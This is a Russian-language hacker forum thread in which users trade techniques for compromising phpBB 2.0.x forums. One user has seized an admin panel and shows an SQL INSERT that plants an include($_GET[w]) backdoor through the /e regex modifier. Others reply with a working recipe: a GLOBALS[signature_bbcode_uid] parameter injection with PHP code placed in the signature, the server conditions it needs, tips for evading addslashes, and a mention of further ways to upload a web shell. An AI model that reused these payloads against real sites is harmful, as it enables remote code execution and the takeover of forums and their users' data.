 |
|
01.07.2007, 05:21
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами:
10038327
Репутация:
251
|
|
Вопрос по phpbb!
Получил админку, хотел сделать инклуд через базу (через бекапп)
Составил запрос -->
Код:
Insert INTO phpbb_users (user_id, user_active, username, user_password, user_session_time, user_session_page, user_lastvisit, user_regdate, user_level, user_posts, user_timezone, user_style, user_lang, user_dateformat, user_new_privmsg, user_unread_privmsg, user_last_privmsg, user_emailtime, user_viewemail, user_attachsig, user_allowhtml, user_allowbbcode, user_allowsmile, user_allowavatar, user_allow_pm, user_allow_viewonline, user_notify, user_notify_pm, user_popup_pm, user_rank, user_avatar, user_avatar_type, user_email, user_icq, user_website, user_from, user_sig, user_sig_bbcode_uid, user_aim, user_yim, user_msnm, user_occ, user_interests, user_actkey, user_newpasswd) VALUES('2511111', '1', 'user', 'e10adc3949ba59abbe56e057f20f883e', '0', '0', '0', '1141890952', '0', '0', '0.00', '1', 'english', 'D M d, Y g:i a', '0', '0', '0', NULL, '0', '1', '0', '1', '1', '1', '1', '1', '0', '1', '1', '0', '', '0', '', '', '', '', 'a:include($_GET[w])', '(.+)/e\0', '', '', '', '', '', '', NULL);
Но при переходе в профайл по ссылке вида -->
profile.php?mode=editprofile
Получаю ошибку
Код:
Parse error: parse error, unexpected ']' in /var/www/1/xost/web/forum/includes/usercp_register.php(759) : regexp code on line 1
Fatal error: Failed evaluating code: ] in /var/www/1/xost/web/forum/includes/usercp_register.php on line 759
Как это исправить. Я понял что ] - ковычка выдает ошибку.Версия форума 2.0.4 |
|
|
03.07.2007, 19:12
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
Ну про версию бабушка надвое скала... (форум может быть проапдейчен вручную без CHANGELOG.html, может быть переписан, что наврядли, и тд)
Бага (если она есть) юзается так: (цопирайты K1b0rg):
Бага в профайле signature_bbcode_uid (Нужен юзер, с любыми правами).
Как юзать: Значит регаемся на форуме, заходим в профайл. Правим страницу.. (Проще регаться нормально, а не через 1 место имхо  (с) Басурман)
<form action="profile.php" enctype="multipart/form-data" method="post">
меняем на
<form action="profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00" enctype="multipart/form-data" method="post">
В подпись(Signature) суем такую бяку
kibi:`ls`
Вообщем, сначала любое слово, потом двоеточие ,а после него php код. Вставляем, сохраняем, ползем обратно в профайл, и нежно издыхаем, от результатов.
Бага настока редкая, что просто охренеть.
Для нее условия
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
ЭТО ОЧЕНЬ РЕДКОЕ сочетание, поэтому не удивляйтесь, если пахать не будет. Еще есть как минимум 6 способов залишь шелл, ты выбрал самый геморойный и к тому же неверно реализовал. Смотри тему в важных "FAQ по PHPBB", там все написано
Последний раз редактировалось Basurman; 03.07.2007 в 19:15..
|
|
|
|
03.07.2007, 19:20
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
ЭТО ОЧЕНЬ РЕДКОЕ сочетание, поэтому не удивляйтесь, если пахать не будет.
обрати внимание на эту строчку (чекни потом через пхпинфо)
по сути, залить шелл можно более простыми способами (как уже сказали выше), особенно при safe mode = 0
|
|
|
|
03.07.2007, 20:06
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами:
10038327
Репутация:
251
|
|
2 Basurman
Знаешь это ты посоветовал , то что врядли прокатит, а у меня в моем способе все просто
обновил акк и инклуд готов. Вопрос был почему ] - из a:include($_GET[w]) вылазит как ошибка!
|
|
|
|
03.07.2007, 20:42
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
Знаешь это ты посоветовал , то что врядли прокатит
Это ты про что? Если про CHANGELOG, то это ж не панацея  По другому ты не определишь версию (только свежие). Доверяй, но проверяй, как говорится.
А не работает из-за addslashes()
Если охота позамарачиваться, попробуй через функцию char()
Последний раз редактировалось Basurman; 03.07.2007 в 20:44..
|
|
|
|
03.07.2007, 20:49
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
А, да, забыл совсем. Чтобы не резал, можно еще немного bbcode.php поправить
хотя нет - туплю. ббкоды только в теле
Последний раз редактировалось Basurman; 03.07.2007 в 20:53..
|
|
|
|
03.07.2007, 20:50
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами:
10038327
Репутация:
251
|
|
Так как это сделать с char --a:include($_GET[w])
|
|
|
|
03.07.2007, 20:56
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
Попробуй по крайней мере... В смысле как?Открываешь в виндовс таблицу символов, потом пишешь что-то вроде char(1,2,4)
А чем другие способы не приглянулись?
Последний раз редактировалось Basurman; 03.07.2007 в 21:35..
|
|
|
|
03.07.2007, 21:30
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
мб я туплю, но просто include($w) не прокатит?
|
|
|
|
03.07.2007, 21:45
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
Я тоже туплю
Оно не заработает - на форуме в подписи и будет висеть include($w) или $_get[w]
как я и писал выше
ЭТО ОЧЕНЬ РЕДКОЕ сочетание, поэтому не удивляйтесь, если пахать не будет.
Это бажный PHP 5-й версии (внимание на ссылку со словом GLOBALS) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
